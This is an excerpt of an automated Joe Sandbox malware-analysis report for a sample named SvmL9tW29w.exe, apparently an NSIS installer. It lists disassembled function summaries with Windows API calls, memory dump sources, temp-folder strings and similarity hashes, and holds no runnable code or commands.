                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                              • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                              • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                              • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                              APIs
                                                              • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                              • wsprintfA.USER32 ref: 00404A6A
                                                              • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                              • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                              • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                              • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                              APIs
                                                              • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403335,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 00405A95
                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403335,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 00405A9E
                                                              • lstrcatA.KERNEL32(?,0040A014,?,?,?,?), ref: 00405AAF
                                                              Strings
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A8F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                              • API String ID: 2659869361-2382934351
                                                              • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                              • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                              • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                              • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,0040301B,?), ref: 00402E50
                                                              • GetTickCount.KERNEL32 ref: 00402E6E
                                                              • CreateDialogParamA.USER32(?,00000000,00402DBA,00000000), ref: 00402E8B
                                                              • ShowWindow.USER32(00000000,?), ref: 00402E99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                              • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                              • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                              • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                              APIs
                                                                • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Monoscelans Setup,NSIS Error,?,?,?,?), ref: 00406104
                                                                • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                              • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                              • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BE0
                                                              Strings
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B7D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                              • API String ID: 3248276644-2382934351
                                                              • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                              • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                              • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                              • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 004051C1
                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                              • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                              • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                              • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,771B3410,00000000,C:\Users\user~1\AppData\Local\Temp\,0040384D,00403667,?,?,?,?,?), ref: 0040388F
                                                              • GlobalFree.KERNEL32(0056A3F8), ref: 00403896
                                                              Strings
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403875
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                              • API String ID: 1100898210-2382934351
                                                              • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                              • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                              • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                              • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                              APIs
                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SvmL9tW29w.exe,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00405ADC
                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SvmL9tW29w.exe,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00405AEA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-3976562730
                                                              • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                              • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                              • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                              • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 3e2b021de54c34d150307f90ed0358cc5bc0683d224d38ff078020f78a55888e
                                                              • Instruction ID: e99ed85c1035aca70058c183240f00497e7dce8627ee4242b59134aff1928afa
                                                              • Opcode Fuzzy Hash: 3e2b021de54c34d150307f90ed0358cc5bc0683d224d38ff078020f78a55888e
                                                              • Instruction Fuzzy Hash: 5B31C4B2718145AFE7018FAADD48F76BFB8EB45260BE40119EC46C7212DA749E30DB10
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                              • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                              • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                              • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                              • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8